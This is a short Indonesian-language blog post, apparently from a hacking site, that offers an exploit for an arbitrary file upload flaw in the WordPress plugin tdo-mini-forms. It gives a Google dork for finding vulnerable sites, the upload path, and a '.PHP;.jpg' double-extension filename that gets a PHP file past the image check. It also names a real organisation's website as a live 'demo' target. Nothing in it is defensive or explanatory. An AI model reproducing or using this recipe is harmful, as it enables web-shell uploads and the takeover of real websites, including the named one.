Bug file upload di "wordpress Plugin tdo-mini-forms"
Exploit 0 Comments »[ type attack ]
tamper data
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776
0 Responses to "Bug file upload di "wordpress Plugin tdo-mini-forms""
Posting Komentar